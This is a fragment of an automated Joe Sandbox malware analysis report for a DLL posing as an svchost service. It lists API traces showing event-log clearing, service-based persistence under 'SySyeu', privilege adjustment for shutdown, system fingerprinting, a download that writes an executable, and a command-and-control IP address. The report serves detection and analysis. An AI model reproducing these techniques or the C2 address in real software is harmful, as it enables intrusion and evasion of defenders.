                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Event$ClearCloseOpen
                                                                                                                • String ID: (b$Application$Security$System
                                                                                                                • API String ID: 1391105993-346596376
                                                                                                                • Opcode ID: 979e5dc6c9d061fd1560a2a7781cfa77c6718ec7c1a2c36edda2fbc21b44326a
                                                                                                                • Instruction ID: bc44e267b22650a43e45f5af2b99767b5e3e23e3035c63c9d4cfe444952d6dd8
                                                                                                                • Opcode Fuzzy Hash: 979e5dc6c9d061fd1560a2a7781cfa77c6718ec7c1a2c36edda2fbc21b44326a
                                                                                                                • Instruction Fuzzy Hash: 5D018F71E00A99BBFB00DF94984479DBFB4EB097C9FA04095E506EB248D73A8E408F95
                                                                                                                APIs
                                                                                                                • strlen.MSVCRT ref: 10001F4E
                                                                                                                  • Part of subcall function 10001ACF: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 10001ADF
                                                                                                                  • Part of subcall function 10001ACF: OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10001AF5
                                                                                                                  • Part of subcall function 10001ACF: QueryServiceStatus.ADVAPI32(00000000,?), ref: 10001B06
                                                                                                                  • Part of subcall function 10001ACF: ControlService.ADVAPI32(00000000,00000001,?), ref: 10001B1D
                                                                                                                  • Part of subcall function 10001ACF: Sleep.KERNEL32(0000000A), ref: 10001B2F
                                                                                                                  • Part of subcall function 10001ACF: QueryServiceStatus.ADVAPI32(00000000,?), ref: 10001B3A
                                                                                                                  • Part of subcall function 10001ACF: CloseServiceHandle.ADVAPI32(00000000), ref: 10001B43
                                                                                                                  • Part of subcall function 10001ACF: CloseServiceHandle.ADVAPI32(00000000), ref: 10001B4A
                                                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,?,?,?,?,10002F76,SySyeu), ref: 10001F6B
                                                                                                                • OpenServiceA.ADVAPI32(00000000,?,000F01FF,?,?,?,?,10002F76,SySyeu), ref: 10001F7F
                                                                                                                • DeleteService.ADVAPI32(00000000,?,?,?,?,10002F76,SySyeu), ref: 10001F8C
                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,10002F76,SySyeu), ref: 10001F93
                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,10002F76,SySyeu), ref: 10001F9A
                                                                                                                Strings
                                                                                                                • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost, xrefs: 10001FA7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Service$CloseHandleOpen$ManagerQueryStatus$ControlDeleteSleepstrlen
                                                                                                                • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost
                                                                                                                • API String ID: 625463800-1784019800
                                                                                                                • Opcode ID: 02807cd9fc2c2d172a8d2777ce926d73bc9f3961fff41b6754e738332fe71101
                                                                                                                • Instruction ID: 320e00f64ca60edd69a113f9dbbd44adb98dc69d7bce9bbf9f1d19ab5e200103
                                                                                                                • Opcode Fuzzy Hash: 02807cd9fc2c2d172a8d2777ce926d73bc9f3961fff41b6754e738332fe71101
                                                                                                                • Instruction Fuzzy Hash: 39F096B610912A7FF1106771ECCCDBF7E6DDB4E2D6B120428F5055600ECF2658418571
                                                                                                                APIs
                                                                                                                  • Part of subcall function 10004822: memset.MSVCRT ref: 10004857
                                                                                                                  • Part of subcall function 10004822: memset.MSVCRT ref: 1000486A
                                                                                                                  • Part of subcall function 10004822: memset.MSVCRT ref: 10004878
                                                                                                                  • Part of subcall function 10004822: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00002081,00000144,00000000), ref: 10004885
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000489D
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 100048AD
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 100048BD
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 100048CA
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 100048D7
                                                                                                                  • Part of subcall function 10004822: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00002081,00000144,00000000), ref: 10004A63
                                                                                                                • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 100035C9
                                                                                                                • wsprintfA.USER32 ref: 100035DE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$memset$Library$FreeInfoLoadSystemwsprintf
                                                                                                                • String ID: %d*%sMHz$HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz
                                                                                                                • API String ID: 86330591-2169120903
                                                                                                                • Opcode ID: dc211f4c5e3334b9a75a581acafed69773f2644d7a1948e9a9c8f06f08de0db5
                                                                                                                • Instruction ID: e0e52339f3a0edf701dd4b0822ed73eda2d577ef34cae91861143d544cce4ff8
                                                                                                                • Opcode Fuzzy Hash: dc211f4c5e3334b9a75a581acafed69773f2644d7a1948e9a9c8f06f08de0db5
                                                                                                                • Instruction Fuzzy Hash: 93F054B1900149BFFB04DBE8CD05DEEBB6DDB1C144F200464FB01F5055E6629A148766
                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNEL32(?,00000000,?,?,100039AB,00000000), ref: 10003D99
                                                                                                                • free.MSVCRT ref: 10003DA8
                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,100039AB,00000000), ref: 10003DBE
                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,100039AB,00000000), ref: 10003DC6
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 10003DCD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Free$Heap$LibraryProcessVirtualfree
                                                                                                                • String ID:
                                                                                                                • API String ID: 831075735-0
                                                                                                                • Opcode ID: 667178307696715c23ee8a0b861fe9ca313d72f521eb66f714d6403ad810cf37
                                                                                                                • Instruction ID: 71511c0ad6a298159b0eec715adc94005effd13d7d75cd72595928e5cffca51a
                                                                                                                • Opcode Fuzzy Hash: 667178307696715c23ee8a0b861fe9ca313d72f521eb66f714d6403ad810cf37
                                                                                                                • Instruction Fuzzy Hash: DC01ED72500611AFE7219FA5DCC895BB7EDFB443A1311892EF19A93554C731BC45CB50
                                                                                                                APIs
                                                                                                                  • Part of subcall function 10004666: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,SeShutdownPrivilege), ref: 1000467E
                                                                                                                  • Part of subcall function 10004666: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 1000468E
                                                                                                                  • Part of subcall function 10004666: GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 10004699
                                                                                                                  • Part of subcall function 10004666: GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 100046A4
                                                                                                                  • Part of subcall function 10004666: LoadLibraryA.KERNEL32(kernel32.dll,?,SeShutdownPrivilege), ref: 100046AE
                                                                                                                  • Part of subcall function 10004666: GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 100046B9
                                                                                                                  • Part of subcall function 10004666: LoadLibraryA.KERNEL32(KERNEL32.dll,?,SeShutdownPrivilege), ref: 10004701
                                                                                                                  • Part of subcall function 10004666: GetProcAddress.KERNEL32(00000000,GetLastError), ref: 10004709
                                                                                                                  • Part of subcall function 10004666: CloseHandle.KERNEL32(?,?,SeShutdownPrivilege), ref: 10004718
                                                                                                                  • Part of subcall function 10004666: FreeLibrary.KERNEL32(00000000,?,SeShutdownPrivilege), ref: 10004729
                                                                                                                  • Part of subcall function 10004666: FreeLibrary.KERNEL32(00000000,?,SeShutdownPrivilege), ref: 10004734
                                                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 100025B8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryProc$Load$Free$CloseExitHandleWindows
                                                                                                                • String ID: SeShutdownPrivilege
                                                                                                                • API String ID: 3789203340-3733053543

Control-flow Graph

APIs
• memset.MSVCRT ref: 10004857
• memset.MSVCRT ref: 1000486A
• memset.MSVCRT ref: 10004878
• LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00002081,00000144,00000000), ref: 10004885
• GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000489D
• GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 100048AD
• GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 100048BD
• GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 100048CA
• GetProcAddress.KERNEL32(?,RegCloseKey), ref: 100048D7
• strchr.MSVCRT ref: 10004991
• lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,00002081,00000144,00000000), ref: 10004A3F
• FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00002081,00000144,00000000), ref: 10004A63
Strings
Similarity
• API ID: AddressProc$memset$Library$FreeLoadlstrcpystrchr
• String ID: %08X$ADVAPI32.dll$RegCloseKey$RegEnumKeyExA$RegEnumValueA$RegOpenKeyExA$RegQueryValueExA
• API String ID: 3659255042-2913591164

Control-flow Graph

APIs
Strings
Similarity
• API ID: memset$lstrcatstrrchrstrstr$CreateEnvironmentExpandProcessStringslstrcpystrcpystrlenstrncpywsprintf
• String ID: "%1$%s\shell\open\command$D$WinSta0\Default
• API String ID: 4079107157-33419044

Control-flow Graph

APIs
• LoadLibraryA.KERNEL32(ADVAPI32.dll,?,SeShutdownPrivilege), ref: 1000467E
• GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 1000468E
• GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 10004699
• GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 100046A4
• LoadLibraryA.KERNEL32(kernel32.dll,?,SeShutdownPrivilege), ref: 100046AE
• GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 100046B9
• LoadLibraryA.KERNEL32(KERNEL32.dll,?,SeShutdownPrivilege), ref: 10004701
• GetProcAddress.KERNEL32(00000000,GetLastError), ref: 10004709
• CloseHandle.KERNEL32(?,?,SeShutdownPrivilege), ref: 10004718
• FreeLibrary.KERNEL32(00000000,?,SeShutdownPrivilege), ref: 10004729
• FreeLibrary.KERNEL32(00000000,?,SeShutdownPrivilege), ref: 10004734
Strings
Similarity
• API ID: AddressLibraryProc$Load$Free$CloseHandle
• String ID: ADVAPI32.dll$AdjustTokenPrivileges$GetCurrentProcess$GetLastError$KERNEL32.dll$LookupPrivilegeValueA$OpenProcessToken$SeShutdownPrivilege$kernel32.dll
• API String ID: 2887716753-2040270271

Control-flow Graph

APIs
• LoadLibraryA.KERNEL32(wininet.dll,?,00000001,00000000), ref: 1000454D
• GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 10004564
• GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 1000457E
• FreeLibrary.KERNEL32(00000000,?,00000001,00000000), ref: 1000459C
• CreateFileA.KERNEL32(10002CDC,40000000,00000000,00000000,00000002,00000000,00000000,?,00000001,00000000), ref: 100045B7
• memset.MSVCRT ref: 100045D3
• GetProcAddress.KERNEL32(10002CDC,InternetReadFile), ref: 100045E3
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,00000001,00000000), ref: 1000461B
• CloseHandle.KERNEL32(00000000,?,00000001,00000000), ref: 1000462E
• Sleep.KERNEL32(00000001,?,00000001,00000000), ref: 10004639
• GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 10004645
• FreeLibrary.KERNEL32(00000000,?,00000001,00000000), ref: 10004658
Strings
Similarity
• API ID: AddressProc$Library$FileFree$CloseCreateHandleLoadSleepWritememset
• String ID: InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$MSIE 6.0$MZ$wininet.dll
• API String ID: 2364563185-3604101231

Control-flow Graph

APIs
• __EH_prolog.LIBCMT ref: 10002DA3
• wsprintfA.USER32 ref: 10002DD0
• CreateMutexA.KERNEL32(00000000,00000000,?), ref: 10002DE4
• GetLastError.KERNEL32 ref: 10002DF0
• ReleaseMutex.KERNEL32(00000000), ref: 10002DFE
• CloseHandle.KERNEL32(00000000), ref: 10002E05
• rand.MSVCRT ref: 10002E28
• Sleep.KERNEL32 ref: 10002E37
• lstrcatA.KERNEL32(00000000,119.91.152.151), ref: 10002E60
• strcmp.MSVCRT ref: 10002E72
• GetTickCount.KERNEL32 ref: 10002E8A
• GetTickCount.KERNEL32 ref: 10002EA6
• WaitForSingleObject.KERNEL32(?,00000064,?,?,?,00002081), ref: 10002F0F
• Sleep.KERNEL32(000001F4), ref: 10002F1C
Strings
Similarity
• API ID: CountMutexSleepTick$CloseCreateErrorH_prologHandleLastObjectReleaseSingleWaitlstrcatrandstrcmpwsprintf
• String ID: %s:%d:%s$119.91.152.151$SySyeu
• API String ID: 4065721159-4228222833

Control-flow Graph

APIs
• LoadLibraryA.KERNEL32(ADVAPI32.dll,?,00000000,?), ref: 10004AC0
• GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 10004AD7
• GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 10004AE2
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 10004AED
• GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 10004AF8
• GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 10004B03
• GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 10004B0E
• FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 10004C02
Strings
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                                                • String ID: ADVAPI32.dll$RegCloseKey$RegCreateKeyExA$RegDeleteKeyA$RegDeleteValueA$RegOpenKeyExA$RegSetValueExA
                                                                                                                • API String ID: 2449869053-3188892968
                                                                                                                • Opcode ID: b9fec3eb9a562a6a9266f8090f520ea499f34599839294b39172511a198aaae8
                                                                                                                • Instruction ID: 2058804bda021c861d2603192b8c2d3dc199326d0aa42d29f4cfa0892e9c0375
                                                                                                                • Opcode Fuzzy Hash: b9fec3eb9a562a6a9266f8090f520ea499f34599839294b39172511a198aaae8
                                                                                                                • Instruction Fuzzy Hash: E741E3B1900259BFFF11DF94DC84EEEBAB9FB08695F114026FA24A2168DB318C159B64

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 10001608
                                                                                                                • memcmp.MSVCRT(?,?,00000003,00000000,00000000,00002000), ref: 10001635
                                                                                                                • memcpy.MSVCRT(00000003,00000000,00000003,00000000,?,00000003,00000000,00000000,00002000), ref: 1000169E
                                                                                                                • memcmp.MSVCRT(00000003,00000003,00000003,00000003,00000000,00000003,00000000,?,00000003,00000000,00000000,00002000), ref: 100016AD
                                                                                                                • _CxxThrowException.MSVCRT(?,10005370), ref: 100016C9
                                                                                                                • memcpy.MSVCRT(?,00000000,00000004,00000003,00000000,?,00000003,00000000,00000000,00002000), ref: 100016E1
                                                                                                                • ??2@YAPAXI@Z.MSVCRT(?,?,00000004,?,00000004,?,00000004,00000003,00000003,?,?,00000003,00000000,?,00000003,00000000), ref: 10001743
                                                                                                                • ??2@YAPAXI@Z.MSVCRT(?,?,00000004,?,00000004,?,00000004,00000003,00000003,?,?,00000003,00000000,?,00000003,00000000), ref: 1000174F
                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,?,00000004,?,00000004,?,00000004,00000003,00000003,?,?,00000003,00000000,?), ref: 100017A7
                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000004,?,00000004,?,00000004,00000003,00000003,?,?,00000003,00000000,?), ref: 100017B0
                                                                                                                • _CxxThrowException.MSVCRT(?,10005370), ref: 100017CD
                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,10005370,?,00000004,?,00000004,?,00000004,00000003,00000003,?,?,00000003,00000000,?), ref: 100017DC
                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,10005370,?,00000004,?,00000004,?,00000004,00000003,00000003,?,?,00000003,00000000,?), ref: 100017EA
                                                                                                                  • Part of subcall function 10001863: ??2@YAPAXI@Z.MSVCRT(1000381E,?,00000144,00000000,1000381E,000000C8,00000144), ref: 10001884
                                                                                                                  • Part of subcall function 10001863: memcpy.MSVCRT(00000000,000000C8,1000381E,?,00000144,00000000,1000381E,000000C8,00000144), ref: 1000189C
                                                                                                                  • Part of subcall function 10001863: ??3@YAXPAX@Z.MSVCRT(00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 100018F3
                                                                                                                  • Part of subcall function 10001863: ??2@YAPAXI@Z.MSVCRT(00000001,00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 100018FB
                                                                                                                  • Part of subcall function 10001863: memcpy.MSVCRT(00000000,000000C8,00000001,00000001,00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?), ref: 1000190A
                                                                                                                  • Part of subcall function 10001863: ??3@YAXPAX@Z.MSVCRT(00000000,00000144,00000001,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 10001932
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$??2@memcpy$ExceptionThrowmemcmp$H_prolog
                                                                                                                • String ID: P`$``
                                                                                                                • API String ID: 1493374972-3525061398
                                                                                                                • Opcode ID: 10262e34717a2dc6bb8153166a79431bc9c49f8163c052bb3b4c512cb2356511
                                                                                                                • Instruction ID: 8fe5d1832865b8ccca8e0fc317077c96d8ecfcaf39360939d2f87a7bcfb0ed6c
                                                                                                                • Opcode Fuzzy Hash: 10262e34717a2dc6bb8153166a79431bc9c49f8163c052bb3b4c512cb2356511
                                                                                                                • Instruction Fuzzy Hash: 1E51B4B5A00109ABFF44DFA4CD82EEEB7BAFF48680F004019F605A7185DF75AA50CB95

                                                                                                                Control-flow Graph

Legend: • Executed • Not Executed
Basic blocks (id: address range, API calls):
• 260: 100031d2-10003244, LoadLibraryA, GetProcAddress ×3, LoadLibraryA, GetProcAddress
• 263: 10003246-1000325b
• 264: 1000325d-1000325f
• 265: 100032f2-100032f6
• 267: 10003264-10003268
• 268: 1000326d-10003282
• 270: 10003284-1000329a
• 271: 100032d5-100032e0
• 274: 100032e2-100032e3, FreeLibrary
• 275: 100032e5-100032e8
• 276: 100032ca-100032d3
• 277: 1000329c-100032b7
• 278: 100032ea-100032ed, FreeLibrary
• 279: 100032ef
• 282: 100032c1-100032c5
• 283: 100032b9-100032bc
Edges: 260->263, 260->264, 263->264, 263->267, 264->265, 267->268, 268->270, 268->271, 270->276, 270->277, 271->274, 271->275, 274->275, 275->278, 275->279, 276->268, 277->282, 277->283, 278->279, 279->265, 282->276, 283->282
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(Ole32.dll,?,00000144,00000000), ref: 100031E6
                                                                                                                • GetProcAddress.KERNEL32(00000000,CoInitialize), ref: 100031F6
                                                                                                                • GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 10003201
                                                                                                                • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 1000320C
                                                                                                                • LoadLibraryA.KERNEL32(Oleaut32.dll,?,?,?,?,?,?,?,?,?,?,?,?,100037D5), ref: 10003216
                                                                                                                • GetProcAddress.KERNEL32(00000000,SysFreeString), ref: 10003221
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,100037D5), ref: 100032E3
                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,100037D5), ref: 100032ED
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryProc$FreeLoad
                                                                                                                • String ID: CoCreateInstance$CoInitialize$CoUninitialize$FriendlyName$Ole32.dll$Oleaut32.dll$SysFreeString
                                                                                                                • API String ID: 2256533930-3340630095
                                                                                                                • Opcode ID: f1eadba59b2ebd071f72d2f7cbb709308b938fb940b81a85d55ffd123040d419
                                                                                                                • Instruction ID: 1885695b6b8551886770f00f979ae30a25f1f1d427a69892d216d7985a67bda5
                                                                                                                • Opcode Fuzzy Hash: f1eadba59b2ebd071f72d2f7cbb709308b938fb940b81a85d55ffd123040d419
                                                                                                                • Instruction Fuzzy Hash: 1641EA70A00219AFEB01DBA5CC88DEFBBBDFF89795B208459F505E7258D7719901CBA0

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • wsprintfA.USER32 ref: 1000306C
                                                                                                                • strlen.MSVCRT ref: 10003078
                                                                                                                • strlen.MSVCRT ref: 1000308E
                                                                                                                  • Part of subcall function 10004A93: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,00000000,?), ref: 10004AC0
                                                                                                                  • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 10004AD7
                                                                                                                  • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 10004AE2
                                                                                                                  • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 10004AED
                                                                                                                  • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 10004AF8
                                                                                                                  • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 10004B03
                                                                                                                  • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 10004B0E
                                                                                                                  • Part of subcall function 10004A93: FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 10004C02
                                                                                                                • strlen.MSVCRT ref: 100030B4
                                                                                                                • GetLocalTime.KERNEL32(?), ref: 100030D7
                                                                                                                • wsprintfA.USER32 ref: 100030FF
                                                                                                                • strlen.MSVCRT ref: 1000310D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$strlen$Librarywsprintf$FreeLoadLocalTime
                                                                                                                • String ID: %4d-%.2d-%.2d %.2d:%.2d$Default$Group$InstallTime$Remark$SYSTEM\CurrentControlSet\Services\%s$SySyeu
                                                                                                                • API String ID: 124699875-2222266080
                                                                                                                • Opcode ID: 01154ca105bfda5f078472489b81bc39b1063e4cdbc4f1aa553d48ab01563500
                                                                                                                • Instruction ID: 2672780922b42b35e2a89e682ca47f3d516b1e1a70e82393c56e9bdbe1b2b31e
                                                                                                                • Opcode Fuzzy Hash: 01154ca105bfda5f078472489b81bc39b1063e4cdbc4f1aa553d48ab01563500
                                                                                                                • Instruction Fuzzy Hash: CE211DA28001287BF710E794DC89DFF76BDEB4D695F5400A6FA01E1049EB39AE418775

                                                                                                                Control-flow Graph

Legend: • Executed • Not Executed
Basic blocks (id: address range, API calls):
• 293: 10004369-10004416, LoadLibraryA, GetProcAddress ×4, LoadLibraryA, GetProcAddress
• 297: 10004425-10004428
• 298: 10004418-10004423
• 299: 1000442e-10004448, call 1000444c
• 302: 1000442a
Edges: 293->297, 293->298, 297->299, 298->297, 298->302, 302->299
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(user32.dll,00000000,00000000,00000000), ref: 1000439A
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetThreadDesktop), ref: 100043AD
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 100043B8
                                                                                                                • GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 100043C3
                                                                                                                • GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 100043D1
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 100043DB
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetCurrentThreadId), ref: 100043E6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
